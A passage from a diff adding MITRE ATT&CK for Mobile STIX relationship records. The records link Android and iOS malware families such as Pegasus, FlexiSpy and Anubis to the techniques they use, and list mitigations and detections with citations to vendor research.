"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6c0105f3-e919-499d-b080-d127394d2837", + "created": "2022-03-30T18:14:23.210Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Typically, insecure or malicious configuration settings are not installed without the user's consent. Users should be advised not to install unexpected configuration settings (CA certificates, iOS Configuration Profiles, Mobile Device Management server provisioning). ", + "modified": "2022-03-30T18:14:23.210Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--92879f0e-d1db-4407-9cc6-c1dbcc47caea", + "created": "2019-10-18T14:52:53.193Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect devices with unauthorized or unsafe modifications. ", + "modified": "2022-03-30T20:07:50.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c034c66-18ad-4b30-9f17-ed574c10918f", + "created": "2023-03-20T18:56:20.203Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:20.203Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fa13936f-9b9d-4b48-a33f-81044f6cdedb", + "created": "2020-09-15T15:18:12.466Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:17:07.033Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) exfiltrates data using HTTP requests.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76", + "created": "2020-12-17T20:15:22.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:35:41.700Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has collected all outgoing phone numbers that start with “86”.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--30ab9ce7-5369-402a-94ee-f8452642acb9", + "created": "2022-03-30T19:50:37.739Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:50:37.739Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34351abd-1f58-420a-a893-ad822839815d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:33:36.294Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) captures call logs.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1fdad4b5-18a1-4fbf-81ce-861feaf2bbdd", + "type": "relationship", + "created": "2020-04-08T18:55:29.205Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + }, + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." + } + ], + "modified": "2021-01-20T16:01:19.565Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can exfiltrate files encrypted with the ransomware module from the device and can modify external storage.(Citation: Cofense Anubis)(Citation: Trend Micro Anubis) ", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e458d77-c856-4b02-82a7-50947b232dc3", + "type": "relationship", + "created": "2021-10-01T14:42:49.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-06T15:32:46.533Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download a payload or updates from either its C2 server or email attachments in the adversary’s inbox.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f989562f-41a8-46d3-94ba-fca7269ae592", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.072Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is delivered via a a watering hole website that mimics the third-party Android app store APKMonk. In at least one case, the watering hole URL was distributed through Facebook Messenger.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d2c7743-fc75-4524-b217-13867ca1dd10", + "created": "2019-09-03T20:08:00.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:32:04.659Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) can collect the contact list.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3644d1dd-8d9f-4a89-a618-c6b22c2a1a96", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:48.463Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses HTTP requests for C2 communication.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f973c3c-45f8-432a-9859-e8749f2e7418", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.848Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses sensitive data in files, such as messages stored by the WhatsApp, Facebook, and Twitter applications. It also has the ability to access arbitrary filenames and retrieve directory listings.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7793a066-d72b-4a60-9579-e16369ea7185", + "created": "2023-03-20T18:57:55.221Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:55.221Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b98fa6ef-a5f2-4867-8108-8daf8534cc3c", + "created": "2022-04-01T16:51:20.688Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should scrutinize every device administration permission request. If the request is not expected or the user does not recognize the application, the application should be uninstalled immediately.", + "modified": "2022-04-01T16:51:20.688Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d84604bc-2314-4340-b9c1-b1265c0f6c37", + "type": "relationship", + "created": "2020-05-07T15:24:49.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-05-27T13:23:34.544Z", + "description": "Many vulnerabilities related to injecting code into existing applications have been patched in previous Android releases.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb", + "type": "relationship", + "created": "2020-12-18T20:14:47.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.412Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has included native modules.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8bc0abc2-a413-4c05-b2b8-2a92d9cc5556", + "created": "2019-09-04T15:38:56.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + }, + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:44:31.870Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is capable of hiding SuperSU's icon if it is installed and visible.(Citation: FortiGuard-FlexiSpy) [FlexiSpy](https://attack.mitre.org/software/S0408) can also hide its own icon to make detection and the uninstallation process more difficult.(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5012c647-9b58-4a4f-b64f-468c9b76a60c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:53:41.561Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can view contacts.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d562ed4d-ac4d-476b-872e-9e228c580889", + "type": "relationship", + "created": "2020-11-20T16:37:28.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.506Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can obtain a list of installed applications.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eceeb39e-887c-4a9b-a93b-a6fd768e455a", + "type": "relationship", + "created": "2020-07-15T20:20:59.186Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.186Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access device configuration information and status, including Android version, battery level, device model, country, and SIM operator.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69bb264a-3f44-4132-9248-dd80a9f5efa2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:17:53.923Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) locks the device if it is granted admin permissions, displaying a message demanding a ransom payment.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cd6a9777-a8fd-43ca-91dc-cafc7d4b7df3", + "type": "relationship", + "created": "2020-01-27T17:05:58.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.215Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain a list of running processes.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb", + "type": "relationship", + "created": "2020-12-17T20:15:22.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.444Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can load additional Dalvik code while running.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6c859d6b-28b1-409d-90ea-d4eba64edf82", + "type": "relationship", + "created": "2020-09-11T16:22:03.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.301Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect system information, including brand, manufacturer, and serial number.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--32be51e2-f74d-441f-aa0d-952697a76494", + "type": "relationship", + "created": "2019-09-04T15:38:56.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019." + } + ], + "modified": "2019-10-14T18:08:28.599Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) uses a `FileObserver` object to monitor the Skype and WeChat database file and shared preferences to retrieve chat messages, account information, and profile pictures of the account owner and chat participants. [FlexiSpy](https://attack.mitre.org/software/S0408) can also spy on popular applications, including Facebook, Hangouts, Hike, Instagram, Kik, Line, QQ, Snapchat, Telegram, Tinder, Viber, and WhatsApp.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0d2d9c6e-6ac8-4cda-bfa4-cedf26a1760a", + "type": "relationship", + "created": "2021-02-17T20:43:52.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.333Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has used an online cell tower geolocation service to track targets.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 